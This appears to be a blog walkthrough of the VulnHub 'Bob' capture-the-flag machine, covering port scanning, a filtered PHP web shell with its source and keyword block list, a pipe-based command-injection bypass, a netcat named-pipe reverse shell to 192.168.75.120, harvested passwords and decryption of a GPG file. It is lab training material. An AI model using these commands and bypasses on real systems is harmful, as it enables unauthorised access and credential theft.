The full-range port scan using nmap discloses three services running with remotely accessible ports:
-> an ftp server running the ProFTPD version 1.3.5b daemon
-> an Apache web server running on port 80 -> a ssh daemon running on the uncommon port 25468:# nmap -O -sT -sV -p- -T5 192.168.75.130
The ftp server doesn’t allow anonymous access and there’s a robots.txt file on the target server so my summary looked like something like this:
Of course, it may seem like a mess to someone else reading it, but overall I started enumerating each linked page on the target as well as the pages residing within the robots.txt file. The dev_shell.php file seemed to be of most interest, and even though it seemed to contain some kind of filter the simplest way I found to execute a command was to pipe echo along with the command:
echo|cat /etc/passwd
http://192.168.75.130/dev_shell.php Running dirb with the -X .bak option would additionally disclose there are some .bak files on the server containing the sources of the php files, which I achieved easier using listing the web server directory contents from the dev_shell.php web shell, which shows what exactly kind of filter is used. Also note that the web server front page menu has a z-index of -11 which makes the links inaccessible directly so I just reverted it to a positive11 to be able to navigate through the browser.
The source code of dev_shell.php.bak:
<?php
//init
$invalid = 0;
$command = ($_POST['in_command']);
$bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
?>
...
<? php
system("running command...");
//executes system Command
//checks for sneaky ;
if (strpos($command, ';') !==false){
system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
}
else{
$is_he_a_bad_man = explode(' ', trim($command));
//checks for dangerous commands
if (in_array($is_he_a_bad_man[0], $bad_words)){
system("echo Get out skid lol");
}
else{
system($_POST['in_command']);
}
}
?>
The above script would check for a ‘;’ string within the command input, then iterate through the commands and parameters in case not found, split the input by a space and iterate through each array value, and disallow triggering a command in case it’s in the list of restricted commands. However, in case a command is piped it gets executed as the script is vulnerable to command execution via piping and doesn’t check for a “|” passed to its input.
Phase 2: RCE
To spawn a shell, I used the following commands:
echo|mknod /tmp/backpipe p
echo|/bin/sh 0</tmp/backpipe | /bin/nc 192.168.75.120 443 1>/tmp/backpipe
Getting a shell
The ftp server also seems to be prone to the mod_copy Remote Command Execution with E-DB ID: 36803however as the DocumentRoot directory belongs to root, trying this as an exploitation vector wouldn’t work as there isn’t a writable folder on the web server which can be used to store a file and trigger an RCE from there.
Phase 3: Putting together the pieces
From this point it’s all about connecting who said what about who and who stored what (or where) as a password. While browsing through the /home directory the first thing that brought my attention was the file theadminisdumb.txt
Password for user jc : Qwerty
Trying to login as elliot : theadminisdumb would not work, however a login to the system using user jc (james) worked out of the box:
User jc
A file named .old_passwordfile.html can be located in user bob’s home directory as well, exposing additional credentials:
Getting credentials for user jc and seb from within bob’s directory
As can be seen from the screenshot jc has some restrictions placed on his account and is unable to cat files, which can be bypassed by using head, tail or the strings binary. However as a more convenient surface it’s better to aim in further enumeration using Sebastian’s account.
Phase 4: Privilege Escalation
The privilege escalation on this box is rather easy, as long as you look for something suspicious, out of the regular picture. I keep seeing how most people advise to enumerate configuration files and look for issues (with which of course I agree), but my lesson learned on this box was with privilege escalation – there was a file residing on the server, which supposedly should have contained something important – so you have to look for the human element. Once you browse through the directory structure in /home you’d notice the following files in the “Documents” folder of user bob:
Bob’s documents
The file command reports the login.txt.gpg as a “GPG symmetrically encrypted data (AES cipher)
A gpg encrypted file named “login”, is definitely something that must contain valuable information so it has to be looked in thoroughly.
Initially I tried cracking the login.txt.gpg passphrase using the tool PGPCrack-NG and the rockyou.txt dictionary and just left it while doing further enumeration. I didn’t even think it might be stored somewhere in plain-text. The tool didn’t seem to find anything even though I left it for hours while looking for proftpd and ssh(d) misconfigurations due to the output of sudo -l.
Enumerating the user’s bob folder further shows the following content represented in some text files:
# cat staff.txt
This somehow suggests that the user “bob” is in charge on this server, so getting access with bob’s privileges might be worth trying.
Looking at a bash script echoing some commands within the directory discloses the following text:
# cat notes.sh
It doesn’t quite make sense and looks like some random notes from someone bored just talking to himself. The word “Cucumber” seems out of the equation and I tried it as a possible password on the login.txt.pgp file with no success.
At this point I skipped this file and decided it contains nothing useful for hours while trying to look into configuration glitches on the server (like mentioned above).
However looking carefully at the whole picture, and especially the suspicious notes.sh file which is kept in a folder named “Secret” reveals that the first letter of each sentence is actually a word:
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I'm ordering pizza this is going nowhere
People just don't get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em
So the word “HARPOCRATES” (which according to google was the God of silence, secrets and confidentiality) should be either a password for the account Bob or the password required to unlock the file.
Trying it as a direct password on user Bob didn’t work:
Trying to login with bob : HARPOCRATES
However, I succeeded in trying to decrypt the login.txt.gpg file using the passphrase “HARPOCRATES” straight of the box, directly using the shell on the server:
# gpg –batch –passphrase HARPOCRATES -d login.txt.gpg bob:b0bcat_
Logging in with user bob:b0bcat_Privilege Escalation on target Bob – PromiseLabs blog, vulnhub CTF walkthrough
And getting the flag:
Getting the flag on target Bob – vulnhub CTF walkthrough by d7x